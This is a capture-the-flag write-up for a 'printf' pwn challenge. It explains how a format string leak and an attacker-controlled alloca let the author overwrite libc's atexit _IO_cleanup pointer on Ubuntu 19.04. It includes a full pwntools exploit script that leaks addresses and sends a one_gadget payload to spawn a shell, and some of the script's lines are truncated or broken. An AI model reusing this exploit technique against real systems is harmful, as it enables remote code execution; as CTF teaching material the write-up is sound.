The challange implemented a custom printf function which was called on our two inputs then the program exited. This opened a format string vulnerability, which made it possible to leak out important stack/libc/etc base addresses, but %n
was not implemented, so we could not write the memory.
Fortunately for us, it used an uncontrolled alloca
aka. sub rsp, rax
where the parameter was the predicted output buffer length which could be controlled by us using constructs like %1000d
which generated a 1000 byte length buffer on the stack with alloca
This made possible to set rsp
to any lower memory address, and even write into libc’s memory.
Somehow a bunch of pages which included also pointers were not read-only on Ubuntu 19.04 with libc 2.29. This was a weird behavior as the situation was much better on Ubuntu 18.04… I don’t know why they changed it, but whatever, this made the exploitation much easier (possible)!
I tried to overwrite a bunch of targets with OneGadget RCE, but at the end I replaced _IO_cleanup
in the libc_atexit
array which was called at the exit :D
pwndbg> telescope &__elf_set___libc_atexit_element__IO_cleanup__ 10
00:0000│ 0x7ffff7fbf6c8 (__elf_set___libc_atexit_element__IO_cleanup__) —▸ 0x7ffff7e6af50 (_IO_cleanup) ◂— push r15
Here is my full exploit:
from pwn import *
p = remote('', 10001)
p = process('./printf')
print 'pid = %r' %
print "%lx "*40
p.sendlineafter("What's your name?", "%lx "*60)
leakStr = p.recvline()
leaks = [int(x,16) for x in leakStr.strip().split(' ')]
print '%r' % ['0x%x' % x for x in leaks]
libcBase = leaks[ 2] - 0x7f6c93377024 + 0x7f6c9328f000 - 0x25000
bufStart = leaks[50] - 0x7ffedbe84d40 + 0x7ffedbe84b50
prgBase = leaks[49] - 0x5555555550d0 + 0x555555554000
ptrAddr = libcBase - 0x7f07af04f000 + 0x7f07af210598 + 0x25000
system = libcBase - 0x7f6c67f88000 + 0x7f6c67fb5fd0 + 0x25000
oneGadget = libcBase + 0xe2383
stdoutGot = prgBase + 0x5020
stdoutLibc = libcBase - 0x155555330000 + 0x155555515760
runAtExit = libcBase + 0x1E66C8
print 'libcBase = 0x%x, bufStart = 0x%x, prgBase = 0x%x, ptrAddr = 0x%x, stdoutGot = 0x%x, stdoutLibc = 0x%x, system = 0x%x, oneGadget = 0x%x' % (libcBase, bufStart, prgBase, ptrAddr, stdoutGot, stdoutLibc, system, oneGadget)
value = 0x414141
diff = bufStart - runAtExit - 0x223 + 0x5D + 0x20 + 6
# 0xe237f execve("/bin/sh", rcx, [rbp-0x70])
# constraints:
# [rcx] == NULL || rcx == NULL
# [[rbp-0x70]] == NULL || [rbp-0x70] == NULL
# 0xe2383 execve("/bin/sh", rcx, rdx)
# constraints:
# [rcx] == NULL || rcx == NULL
# [rdx] == NULL || rdx == NULL
# 0xe2386 execve("/bin/sh", rsi, rdx)
# constraints:
# [rsi] == NULL || rsi == NULL
# [rdx] == NULL || rdx == NULL
# 0x106ef8 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
payload = "%"+str(diff)+"d"+"A"*3+"B"*8+"C"*(8+5)+"D"*6+p64(oneGadget)+"E"*2
print 'payload (len=%d) = %r' % (len(payload), payload)
if not REMOTE:
print "waiting..."
p.sendlineafter("Do you leave a comment?", payload)
And the flag was: